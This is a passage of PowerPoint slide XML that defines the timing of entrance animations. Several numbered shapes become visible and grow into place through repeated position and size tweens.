                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28680"/>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4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="43" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="55" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="56" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="62" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
